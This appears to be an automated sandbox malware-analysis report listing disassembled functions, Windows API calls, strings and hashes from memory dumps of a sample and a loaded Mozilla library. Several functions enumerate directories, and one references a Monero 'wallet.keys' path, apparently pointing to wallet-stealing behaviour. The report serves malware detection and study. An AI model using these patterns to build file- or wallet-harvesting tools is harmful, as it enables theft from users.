MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C6B3793
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6B37BD
MALLOC_OPTIONS, xrefs: 6C6B35FE
MOZ_CRASH(), xrefs: 6C6B3950

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 3d47ea64b5e60ec0ba958f380313297de42d4eeac17864d25234720cd5f6b160
Instruction ID: 0822ba19d3a49275f7f8fa28e7f1d0801e8a9593246d08842f387c7d75d6eaef
Opcode Fuzzy Hash: 3d47ea64b5e60ec0ba958f380313297de42d4eeac17864d25234720cd5f6b160
Instruction Fuzzy Hash: 7C53AF72A057019FC304CF29C580716FBE1BF89328F29C66DE869AB791D771E852CB85

Function 6C6D34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3EE2

Part of subcall function 6C6D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6D61DD
Part of subcall function 6C6D6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6D622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D4157

Part of subcall function 6C6D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6D6250
Part of subcall function 6C6D6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D4896
free.MOZGLUE ref: 6C6D489F

Strings

, xrefs: 6C6D4CD2

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 16c303b84c9d71a64ab3d12022ed5208c692d5c7e7b5485fe28dae8c259428b1
Instruction ID: 1fc5096b9c47ae93ba167305b6364d55eea607932488f794de885e61bc2d754a
Opcode Fuzzy Hash: 16c303b84c9d71a64ab3d12022ed5208c692d5c7e7b5485fe28dae8c259428b1
Instruction Fuzzy Hash: BFF25D74908B808FC761CF29C08469AFBF1FFCA344F118A5ED99997711DB71A886CB46

Function 6C6864C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6864DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6864F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C686505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C686518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C68652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C68671C
GetCurrentProcess.KERNEL32 ref: 6C686724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C68672F
GetCurrentProcess.KERNEL32 ref: 6C686759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C686764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C686A80
GetSystemInfo.KERNEL32(?), ref: 6C686ABE
__Init_thread_footer.LIBCMT ref: 6C686AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C686AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C686AF7

Strings

nvdxgiwrap.dll, xrefs: 6C686513
detoured.dll, xrefs: 6C6864DA
nvd3d9wrap.dll, xrefs: 6C686500
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C686798
_etoured.dll, xrefs: 6C6864ED
user32.dll, xrefs: 6C686526

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: e4baa4db70cb43ec8f51baeedc8ed62435e9ed57382cbbd13ef2c4e4829936cf
Instruction ID: 4ecc9554f54387ec0bd99ce1c134d618cbeb9c150f6b640fb5754b8f5f346cbc
Opcode Fuzzy Hash: e4baa4db70cb43ec8f51baeedc8ed62435e9ed57382cbbd13ef2c4e4829936cf
Instruction Fuzzy Hash: A5F103709162199FCF20CF25DC88BDAB7B5AF46308F1442D9D819A3680D731EE85CFA9

Function 001933C0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 001933DC
FindFirstFileA.KERNEL32(?,?), ref: 001933F3
lstrcat.KERNEL32(?,?), ref: 00193445
StrCmpCA.SHLWAPI(?,001A0F40), ref: 00193457
StrCmpCA.SHLWAPI(?,001A0F44), ref: 0019346D
FindNextFileA.KERNEL32(000000FF,?), ref: 00193777
FindClose.KERNEL32(000000FF), ref: 0019378C

Strings

%s\*, xrefs: 001933D0
%s\%s, xrefs: 0019357F
%s%s, xrefs: 001935BD
%s\%s, xrefs: 0019348A
%s\%s\%s, xrefs: 0019355A

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 877bffbd439c09ddc8e1734a71863304949744898fefe1f10859c196332ed8a1
Instruction ID: 2e36212f8e732e72f3615755a41ae9c4b9ced5d7e02471dafe771ada0f52f8f3
Opcode Fuzzy Hash: 877bffbd439c09ddc8e1734a71863304949744898fefe1f10859c196332ed8a1
Instruction Fuzzy Hash: 81A14FB2A10208AFDF25DBA4DC85FEE737DBB59300F444588E51E96141EB74AB88CF61

Function 6C6DC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6DC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6DC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6DC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6DCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C6DDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C6DDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6DDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C6DE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C6DE472

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: d966846b9019b01c1569232ee8d4dc98feab5bf0201caf535b8ac6994edd9795
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 3A33BE71E0421A8FCB04CFA8C8806EDBBF2FF49304F2A4269D955AB755D731B945CBA4

Function 6C69ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C69EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C69EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6A1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C6A1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6A1A3E

Strings

~qgl, xrefs: 6C69ED13
~qgl, xrefs: 6C69ED10

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qgl$~qgl
API String ID: 3693777188-195013810
Opcode ID: c7b5f901d571140b648af2b9b89460cb110a8a344c1705b3c65794b14a6a167c
Instruction ID: f18f2f36d3fa3e30ca0427fa01c71d3d573fc8a17b2a808b0a468c7be9df8c32
Opcode Fuzzy Hash: c7b5f901d571140b648af2b9b89460cb110a8a344c1705b3c65794b14a6a167c
Instruction Fuzzy Hash: 7EB31871E0421ACFCB14CFA8C890ADDB7B2BF49304F2581A9D55AAB745D730AD86CF94

Function 6C68FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6FE7B8), ref: 6C68FF81
LeaveCriticalSection.KERNEL32(6C6FE7B8), ref: 6C69022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C690240
EnterCriticalSection.KERNEL32(6C6FE768), ref: 6C69025B
LeaveCriticalSection.KERNEL32(6C6FE768), ref: 6C69027B

Strings

<jemalloc>, xrefs: 6C690D62, 6C690D76, 6C690DA7
: (malloc) Error in VirtualFree(), xrefs: 6C690D67, 6C690D7B, 6C690DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C68FE99, 6C68FEB7, 6C68FED3, 6C690DB8, 6C690DD3, 6C6919B4

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 3a530e1f38452447404a73a51cf703e4662ae2034518fa3f3ffc7fde5b3a0fdc
Instruction ID: f70930e177fbe9a53521d31266bc98e79e34879b467efafae7bce057ee677c8c
Opcode Fuzzy Hash: 3a530e1f38452447404a73a51cf703e4662ae2034518fa3f3ffc7fde5b3a0fdc
Instruction Fuzzy Hash: 83C2E271A057428FD714CF28C580756BBE2BF8A328F28C66DE4698B7D5C771E801CB89

Function 00194050 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00194060
RtlAllocateHeap.NTDLL(00000000), ref: 00194067
wsprintfA.USER32 ref: 00194086
FindFirstFileA.KERNEL32(?,?), ref: 0019409D
StrCmpCA.SHLWAPI(?,001A0F94), ref: 001940CB
StrCmpCA.SHLWAPI(?,001A0F98), ref: 001940E1
FindNextFileA.KERNEL32(000000FF,?), ref: 0019416B
FindClose.KERNEL32(000000FF), ref: 00194180
lstrcat.KERNEL32(?,013AE500), ref: 001941A5
lstrcat.KERNEL32(?,013AD638), ref: 001941B8
lstrlen.KERNEL32(?), ref: 001941C5
lstrlen.KERNEL32(?), ref: 001941D6

Strings

%s\%s, xrefs: 001940FB
%s\*, xrefs: 0019407A

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 8e9264604e02de151958f51885a2ae1f92494e4805b5f507ca8262f5994f47f6
Instruction ID: 40e9d75b740efdee90be0d6f29b8d5fd54a7a2b653013b5cc37f1e687fad145a
Opcode Fuzzy Hash: 8e9264604e02de151958f51885a2ae1f92494e4805b5f507ca8262f5994f47f6
Instruction Fuzzy Hash: FD517572910218AFCB25EBB0DC89FEE737CAF59300F404589B60AD2150EB749B89CF91

Function 0018EB60 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0018EB7E
FindFirstFileA.KERNEL32(?,?), ref: 0018EB95
StrCmpCA.SHLWAPI(?,001A14DC), ref: 0018EBEB
StrCmpCA.SHLWAPI(?,001A14E0), ref: 0018EC01
FindNextFileA.KERNEL32(000000FF,?), ref: 0018F0EE
FindClose.KERNEL32(000000FF), ref: 0018F103

Strings

%s\*.*, xrefs: 0018EB72

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: edd211cbc5abbc0587a415dd47dff1bc84c5f5abfc6b4be309a237bdb84f2c8f
Instruction ID: 20d647f241e4b0e9089d9c086bfe07fc69735a897a84db2bb745bf689430856e
Opcode Fuzzy Hash: edd211cbc5abbc0587a415dd47dff1bc84c5f5abfc6b4be309a237bdb84f2c8f
Instruction Fuzzy Hash: 98E1CD72911118AADF55FB64DC52EEE733CAF65300F8041A9B50A62092EF706B8DDFD2

Function 6C69D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D4F2
LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D50B

Part of subcall function 6C67CFE0: EnterCriticalSection.KERNEL32(6C6FE784), ref: 6C67CFF6
Part of subcall function 6C67CFE0: LeaveCriticalSection.KERNEL32(6C6FE784), ref: 6C67D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D52E
EnterCriticalSection.KERNEL32(6C6FE7DC), ref: 6C69D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C69D6A6
LeaveCriticalSection.KERNEL32(6C6FE7DC), ref: 6C69D712
LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C69D7EA

Strings

<jemalloc>, xrefs: 6C69D827
: (malloc) Error initializing arena, xrefs: 6C69D82C

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 181c8b0630294c635742edd4d71db6058ffad56d98f59d25de81f04213c28c91
Instruction ID: c9290e36a74f84c8237f0f851cbb09f29d182475257fbb5c39ab991d19909437
Opcode Fuzzy Hash: 181c8b0630294c635742edd4d71db6058ffad56d98f59d25de81f04213c28c91
Instruction Fuzzy Hash: 9691C771A047428FD714CF29C59076ABBE2FB85318F14893EE56AC7B81D730E845CB8A

Function 0018DC50 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001A0C19), ref: 0018DC9E
StrCmpCA.SHLWAPI(?,001A146C), ref: 0018DCEE
